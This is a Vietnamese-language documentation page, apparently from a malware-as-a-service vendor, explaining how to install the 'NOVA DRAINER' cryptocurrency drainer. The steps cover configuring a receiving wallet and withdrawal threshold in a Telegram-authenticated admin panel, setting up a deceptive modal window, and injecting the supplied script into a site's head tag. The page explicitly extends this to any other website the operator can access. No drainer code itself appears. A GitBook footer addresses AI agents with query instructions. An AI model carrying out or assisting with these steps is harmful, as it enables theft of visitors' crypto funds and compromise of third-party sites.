> For the complete documentation index, see [llms.txt](https://read.cryptograb.wiki/cryptograb-automatic-affiliate/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://read.cryptograb.wiki/cryptograb-automatic-affiliate/nova-drainer-docs-vi/readme/compiler-cai-dat-tren-trang-cua-ban.md).

# Compiler - Cài đặt trên trang của bạn

## Cài đặt và tổng quan về các chức năng

{% @supademo/embed demoId="cm3g12v0b3l358hspdntrdbqb" url="<https://app.supademo.com/demo/cm3g12v0b3l358hspdntrdbqb>" %}

Hướng dẫn cách cài đặt <mark style="color:màu tím;">NOVA DRAINER</mark> lên hosting và trang web của bạn, cũng như lên bất kỳ trang web nào khác mà bạn có quyền truy cập.

### Bước 1: Xác thực

1. Truy cập trang web [crypto-grab.io](https://crypto-grab.io).
2. Đăng nhập vào bảng quản trị web của bạn bằng xác thực qua Telegram Bot.

### Bước 2: Cấu hình trình biên dịch

1. Trong bảng quản trị web chọn mục <mark style="color:màu xanh dương;">**Compiler**</mark>.
2. Nhập địa chỉ ví của bạn.
3. Đặt số tiền tối thiểu để rút.
4. Các tham số còn lại có thể để mặc định.

Mô tả chi tiết hơn và giải thích các chức năng trong mục [<mark style="color:màu cam;">Bảng quản trị tập trung</mark>](https://read.cryptograb.org/nova-drainer-docs/readme/centralizovannaya-admin-panel)

{% embed url="<https://read.cryptograb.org/nova-drainer-docs/readme/centralizovannaya-admin-panel>" %}

### Bước 3: Cấu hình cửa sổ modal (nếu cần)

1. Chuyển đến mục **Cửa sổ Modal**.
2. Thiết lập hiển thị cửa sổ phù hợp với yêu cầu của bạn.

### Bước 4: Cấu hình bot cá nhân (nếu cần)

1. Nhập thông tin bot của bạn vào mục tương ứng.

### Bước 5: Nhận hướng dẫn và file

1. Sau khi hoàn tất tất cả cài đặt, bạn sẽ được cung cấp mã và file.
2. Chèn mã được cung cấp trước thẻ đóng `</head>` trên trang web của bạn trong file `index.html| index.php`
3. Tải file xuống và đặt nó vào thư mục gốc của trang web bạn.

**Để cấu hình trang web, tải file settings.js, đặt nó vào thư mục gốc của giao diện và chèn những dòng mã này vào cuối thẻ**&#x20;

Theo các bước này, bạn sẽ có thể tích hợp chức năng cần thiết vào trang web của mình.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://read.cryptograb.wiki/cryptograb-automatic-affiliate/nova-drainer-docs-vi/readme/compiler-cai-dat-tren-trang-cua-ban.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
